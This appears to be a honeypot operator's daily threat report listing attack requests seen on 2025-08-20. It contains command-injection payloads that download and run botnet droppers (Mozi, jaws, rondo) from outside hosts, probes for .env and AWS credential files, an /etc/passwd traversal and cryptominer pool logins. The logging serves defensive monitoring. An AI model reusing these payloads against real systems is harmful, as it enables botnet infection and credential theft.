
Report: 2025-08-20

Report Daily
Author: Shoggoth Industries

Daily Report: 2025-08-20

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today's report, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 209 new requests that have never been observed before (these were added to the monitored request database).

A total of 3974 requests were recorded during the day, originating from 4 different countries, with a peak of 2936 requests coming from GB.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial (OT) systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Germany |
| BR | Germany |
| US | Germany |
| GB | Germany |
| GB | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 122.97.209.138 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 197.45.114.121 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1 |
| 45.156.87.165 | GET /cgi-bin/luci/er/reboot_link?link=%27%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hqf.sh%7Csh%60%27 HTTP/1.1 |
| 45.156.87.165 | GET /cgi-bin/luci/er/vlanTag?vlan_tag=%27%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hqf.sh%7Csh%60%27 HTTP/1.1 |

request

The requests listed here are those that had not yet been integrated into the request database.

| number_of_occurence | request |
|---|---|
| 2 | POST /users/loginusers/loginusers/login HTTP/1.1 |
| 2 | POST /users/loginusers/login HTTP/1.1 |
| 2 | POST /users/login HTTP/1.1 |
| 2 | GET /raephaeyeip4fawe HTTP/1.1 |
| 2 | GET /owa HTTP/1.1 |
| 2 | GET /ews HTTP/1.1 |
| 2 | POST /login.cgi HTTP/1.1 |
| 2 | POST /favicon.ico HTTP/1.1 |
| 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x1489f6ebc64b139fadd9fd10c301f1bdbae535f3\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
| 1 | GET /Odin/http/call1755713325 HTTP/1.1 |
| 1 | GET /OdinHttpCall1755713325 HTTP/1.1 |
| 1 | GET /odinhttpcall1755713325 HTTP/1.1 |
| 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246iZmtzv97K4EfaWgrpK1dDeeEzD79fEV3RRGxRUm9sxZJn58BHhpGxT89QzpAwciJBXKoWT5AarG5fXuvRGsQZ1T4QQPea\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
| 1 | GET /.envs/.production/.django HTTP/1.1 |
| 1 | GET //1.1.1.1/../../../etc/passwd HTTP/1.1 |
| 1 | GET /admin/.env~ HTTP/1.1 |
| 1 | GET /admin/.env.save HTTP/1.1 |
| 1 | GET /admin/config.php.bak HTTP/1.1 |
| 1 | GET /admin/wp-config.php.old HTTP/1.1 |
| 1 | GET /api/config.json HTTP/1.1 |
| 1 | GET /autodiscover/autodiscover.xml HTTP/1.1 |
| 1 | GET /backup/.env~ HTTP/1.1 |
| 1 | GET /backup/.env.save HTTP/1.1 |
| 1 | GET /backup/.env.old HTTP/1.1 |
| 1 | GET /backup/config.php.bak HTTP/1.1 |
| 1 | GET /backup/wp-config.php.old HTTP/1.1 |
| 1 | GET /jp/ HTTP/1.1 |
| 1 | GET /uk/ HTTP/1.1 |
| 1 | GET /es/ HTTP/1.1 |
| 1 | GET /us/ HTTP/1.1 |
| 1 | GET /cacti/cmd_realtime.php?1+1&&cat+~/.aws/credentials+1+1+1 HTTP/1.1 |
| 1 | GET /config/.env~ HTTP/1.1 |
| 1 | GET /config/.env.save HTTP/1.1 |
| 1 | GET /config/.env.old HTTP/1.1 |
| 1 | GET /config/config.php.bak HTTP/1.1 |
| 1 | GET /config/secrets.json HTTP/1.1 |
| 1 | GET /core/.env.local HTTP/1.1 |
| 1 | GET /core/.env.bak HTTP/1.1 |
| 1 | GET /config/wp-config.php.old HTTP/1.1 |
| 1 | GET /core/.env~ HTTP/1.1 |
| 1 | GET /core/config.php.bak HTTP/1.1 |
| 1 | GET /core/wp-config.php.old HTTP/1.1 |
| 1 | GET /OdFd HTTP/1.1 |
| 1 | GET /ecp/Current/exporttool HTTP/1.1 |
| 1 | \x22\x00\x00\x00\x12 \x10\x03\x1A\x05:8080\x22\x05:8080*\x06test_02\x06123456 |
| 1 | 8RQ\xDD^\xC77X~\x00\x00\x00\x01e\xDD6\xB0kU,/\xC2/\xC1\x8F’\xF1\x00B\xF37\xD0\xA1P\xCA\xD4\xC3N\xCC\x95\xBC\xF5\x8C\x1AY\xA6\x14\x5C(\xCC\xE6D\xADd |
| 1 | GET /nextjs-app/.env HTTP/1.1 |
| 1 | GET /myproject/.env HTTP/1.1 |
| 1 | GET /node-api/.env HTTP/1.1 |
| 1 | GET /react-app/.env.production HTTP/1.1 |
| 1 | GET /react-app/.env HTTP/1.1 |
| 1 | GET /statistic/finishtask?siteid=20000&tid=9112 HTTP/1.1 |
| 1 | GET /site/.env~ HTTP/1.1 |
| 1 | GET /site/.env.save HTTP/1.1 |
| 1 | GET /site/.env.old HTTP/1.1 |
| 1 | GET /site/.env.local HTTP/1.1 |
| 1 | GET /site/.env.bak HTTP/1.1 |
| 1 | GET /site/config.php.bak HTTP/1.1 |
| 1 | GET /site/wp-config.php.old HTTP/1.1 |
| 1 | GET /src/.env~ HTTP/1.1 |
| 1 | GET /src/.env.save HTTP/1.1 |
| 1 | GET /src/.env.old HTTP/1.1 |
| 1 | \x00\x00\x00o\x98I\xC7lp\xE4\x1BMM\x97<\xDF\xA9\xAE\xEB\x08\x00\x91o\x1D*R\xB1\xD6{nlUk\xE7\xA2\xFE5[*\xA7v\xA7C[\xEE\xC5vo4G\xC5#\xE8\x0Fu\xC9\x5C\xFD\xBB\xB4\xF3\x9C\xBB\xD7e`\xBF |
| 1 | GET /src/config.php.bak HTTP/1.1 |
| 1 | GET /src/config.php HTTP/1.1 |
| 1 | GET /i.dat HTTP/1.1 |
| 1 | GET /src/wp-config.php.old HTTP/1.1 |
| 1 | GET /web-console/ HTTP/1.1 |
| 1 | GET /web/.env~ HTTP/1.1 |
| 1 | GET /web/.env.save HTTP/1.1 |
| 1 | GET /web/.env.old HTTP/1.1 |
| 1 | GET /wordpress/wp-config.php HTTP/1.1 |
| 1 | GET /web/wp-config.php.old HTTP/1.1 |
| 1 | GET /web/config.php.bak HTTP/1.1 |
| 1 | GET /wp-content/backup/sendgrid_keys.json HTTP/1.1 |
| 1 | GET /wp-content/uploads/wp-mail-smtp/sendgrid_keys.json HTTP/1.1 |
| 1 | GET /modules/contrib/sendgrid_mail/sendgrid_mail.services.yml HTTP/1.1 |
| 1 | GET /modules/contrib/sendgrid_mail/sendgrid_mail.module HTTP/1.1 |
| 1 | GET /wp-content/plugins/wp-mail-smtp/sendgrid_keys.json HTTP/1.1 |
| 1 | GET /autodiscover/congress/ HTTP/1.1 |
| 1 | GET /autodiscover/citizen/ HTTP/1.1 |
| 1 | GET /autodiscover/because/ HTTP/1.1 |
| 1 | GET /autodiscover/autodiscovers/ HTTP/1.1 |
| 1 | GET /autodiscover/autodiscoverrs/ HTTP/1.1 |
| 1 | GET /autodiscover/autodiscover%20/ HTTP/1.1 |
| 1 | POST /cgi-bin/system_log.cgi? HTTP/1.1 |
| 1 | GET /ews/autodiscovers/ HTTP/1.1 |
| 1 | GET /ews/%20/ HTTP/1.1 |
| 1 | GET /end/ HTTP/1.1 |
| 1 | GET /empower/ HTTP/1.1 |
| 1 | GET /dust/ HTTP/1.1 |
| 1 | GET /delay/ HTTP/1.1 |
| 1 | GET /behave/ HTTP/1.1 |
| 1 | GET /autodiscover/verb/ HTTP/1.1 |
| 1 | GET /autodiscover/tiger/ HTTP/1.1 |
| 1 | GET /autodiscover/this/ HTTP/1.1 |
| 1 | GET /autodiscover/surprise/ HTTP/1.1 |
| 1 | GET /autodiscover/palace/ HTTP/1.1 |
| 1 | GET /autodiscover/oppose/ HTTP/1.1 |
| 1 | GET /autodiscover/make/ HTTP/1.1 |
| 1 | GET /autodiscover/expire/ HTTP/1.1 |
| 1 | GET /autodiscover/course/ HTTP/1.1 |
| 1 | GET /ews/tower/ HTTP/1.1 |
| 1 | GET /ews/test/ HTTP/1.1 |
| 1 | GET /ews/six/ HTTP/1.1 |
| 1 | GET /ews/sense/ HTTP/1.1 |
| 1 | GET /ews/second/ HTTP/1.1 |
| 1 | GET /ews/question/ HTTP/1.1 |
| 1 | GET /ews/powder/ HTTP/1.1 |
| 1 | GET /ews/pitch/ HTTP/1.1 |
| 1 | GET /ews/often/ HTTP/1.1 |
| 1 | GET /ews/jazz/ HTTP/1.1 |
| 1 | GET /ews/feature/ HTTP/1.1 |
| 1 | GET /ews/exchanges/ HTTP/1.1 |
| 1 | GET /ews/exchange/ HTTP/1.1 |
| 1 | GET /ews/exchange%20/ HTTP/1.1 |
| 1 | GET /ews/ews/ HTTP/1.1 |
| 1 | GET /ews/evoke/ HTTP/1.1 |
| 1 | GET /lbsonlinesoc/august/ HTTP/1.1 |
| 1 | GET /lbs/mystery/ HTTP/1.1 |
| 1 | GET /lbsivr/travel/ HTTP/1.1 |
| 1 | GET /lbsivr/pole/ HTTP/1.1 |
| 1 | GET /lbsivr/noodle/ HTTP/1.1 |
| 1 | GET /lbsivr/member/ HTTP/1.1 |
| 1 | GET /lbs/blue/ HTTP/1.1 |
| 1 | GET /lbs/alpha/ HTTP/1.1 |
| 1 | GET /lbsadmin/valve/ HTTP/1.1 |
| 1 | GET /lbsadmin/salon/ HTTP/1.1 |
| 1 | GET /lbsadmin/disorder/ HTTP/1.1 |
| 1 | GET /lbsadmin/cute/ HTTP/1.1 |
| 1 | GET /hill/ HTTP/1.1 |
| 1 | GET /fitness/ HTTP/1.1 |
| 1 | GET /eye/ HTTP/1.1 |
| 1 | GET /ews/trip/ HTTP/1.1 |
| 1 | GET /oconlinesoc/silver/ HTTP/1.1 |
| 1 | GET /oconlinesoc/provide/ HTTP/1.1 |
| 1 | GET /oconlinesoc/nasty/ HTTP/1.1 |
| 1 | GET /naive/ HTTP/1.1 |
| 1 | GET /lbswap/useful/ HTTP/1.1 |
| 1 | GET /lbswap/problem/ HTTP/1.1 |
| 1 | GET /lbswap/goose/ HTTP/1.1 |
| 1 | GET /lbswap/army/ HTTP/1.1 |
| 1 | GET /lbs/special/ HTTP/1.1 |
| 1 | GET /lbs/secure/seven/ HTTP/1.1 |
| 1 | GET /lbs/secure/patch/ HTTP/1.1 |
| 1 | GET /lbs/secure/model/ HTTP/1.1 |
| 1 | GET /lbs/secure/feel/ HTTP/1.1 |
| 1 | GET /lbsonlinesoc/shoulder/ HTTP/1.1 |
| 1 | GET /lbsonlinesoc/menu/ HTTP/1.1 |
| 1 | GET /lbsonlinesoc/gas/ HTTP/1.1 |
| 1 | GET /route/ HTTP/1.1 |
| 1 | GET /pulllocation/region/ HTTP/1.1 |
| 1 | GET /pulllocation/jungle/ HTTP/1.1 |
| 1 | GET /pulllocation/choice/ HTTP/1.1 |
| 1 | GET /pulllocation/cabbage/ HTTP/1.1 |
| 1 | GET /pelephoneprovisioning/stable/ HTTP/1.1 |
| 1 | GET /pelephoneprovisioning/noodle/ HTTP/1.1 |
| 1 | GET /pelephoneprovisioning/network/ HTTP/1.1 |
| 1 | GET /pelephoneprovisioning/dizzy/ HTTP/1.1 |
| 1 | GET /oshee/ HTTP/1.1 |
| 1 | GET /onlinesoc/toddler/ HTTP/1.1 |
| 1 | GET /onlinesoc/pole/ HTTP/1.1 |
| 1 | GET /onlinesoc/man/ HTTP/1.1 |
| 1 | GET /onlinesoc/fall/ HTTP/1.1 |
| 1 | GET /ofasdaqgrumm/ HTTP/1.1 |
| 1 | GET /oconlinesoc/usual/ HTTP/1.1 |
| 1 | GET /utilities/.env HTTP/1.1 |
| 1 | GET /test/.env.conf HTTP/1.1 |
| 1 | GET /tmp/.env.token HTTP/1.1 |
| 1 | GET /vzixmvmvbvrzhoo/ HTTP/1.1 |
| 1 | GET /utkvvxwkwgseowps/ HTTP/1.1 |
| 1 | GET /uncle/ HTTP/1.1 |
| 1 | GET /Temporary_Listen_Addresses/ HTTP/1.1 |
| 1 | GET /swear/ HTTP/1.1 |
| 1 | GET /sicherung/.env HTTP/1.1 |
| 1 | GET /src/env/env.ts HTTP/1.1 |
| 1 | GET /tmp/.env.local HTTP/1.1 |
| 1 | GET /var/.env.local HTTP/1.1 |
| 1 | GET /staging/.env.1 HTTP/1.1 |
| 1 | GET /symfony/env.py HTTP/1.1 |
| 1 | GET /printenv.shtml HTTP/1.1 |
| 1 | GET /staging/.env.2 HTTP/1.1 |
| 1 | GET /panel/.env.old HTTP/1.1 |
| 1 | GET /panel/.env.pem HTTP/1.1 |
| 1 | GET /panel/.env.tmp HTTP/1.1 |
| 1 | GET /panel/.env.uat HTTP/1.1 |
| 1 | POST /cgi-bin/adv_remotelog.asp HTTP/1.1 |
| 1 | GET /panel/.env.gcp HTTP/1.1 |
| 1 | GET /panel/.env.key HTTP/1.1 |
| 1 | GET /panel/.env.log HTTP/1.1 |
| 1 | GET /download/file.extusers/loginusers/login HTTP/1.1 |
| 1 | GET /download/file.extusers/login HTTP/1.1 |
| 1 | GET /ausers/loginusers/loginusers/login HTTP/1.1 |
| 1 | GET /ausers/loginusers/login HTTP/1.1 |
| 1 | GET /ausers/login HTTP/1.1 |
| 1 | GET /users/loginusers/loginusers/login HTTP/1.1 |
| 1 | GET /users/loginusers/login HTTP/1.1 |
| 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22454cKeGgMdnaw1J5zonuXb96XEfP2X51Z7oECWKpfjYPdhTm5kUpi6BBEuvUaxuL2p8s9YchmGaNTWTZKUXcYBcqTx4SUNQ\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
| 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x6ee7628c6ade21a4148047f7bc4748859ac85f84\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
| 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xEFM\xB4\xBF\xEA |
| 1 | GET /mPlayerusers/loginusers/loginusers/login HTTP/1.1 |
| 1 | GET /mPlayerusers/loginusers/login HTTP/1.1 |
| 1 | GET /mPlayerusers/login HTTP/1.1 |
| 1 | GET /SiteLoaderusers/loginusers/loginusers/login HTTP/1.1 |
| 1 | GET /SiteLoaderusers/loginusers/login HTTP/1.1 |
| 1 | GET /SiteLoaderusers/login HTTP/1.1 |
| 1 | GET /download/file.extusers/loginusers/loginusers/login HTTP/1.1 |
| 1 | \x00\x0E89\xB7\xED\xF2#\xE1 |
| 1 | \x00\x0E\x089\xB7\xED\xF2#\xE1 |

country_iso_code

| number_of_occurence | country_iso_code |
|---|---|
| 2936 | GB |
| 608 | HK |
| 97 | SG |
| 87 | US |
| 82 | BG |
| 37 | ES |
| 33 | NL |
| 29 | DE |
| 18 | SC |
| 5 | IN |
| 5 | CA |
| 4 | RO |
| 4 | BR |
| 3 | JP |
| 3 | LT |
| 3 | ZA |
| 2 | MM |
| 2 | HR |
| 2 | SA |
| 2 | PL |
| 2 | BE |
| 2 | MC |
| 1 | TR |
| 1 | PT |
| 1 | CN |
| 1 | EG |
| 1 | RU |
| 1 | GR |
| 1 | SI |
| 1 | IR |
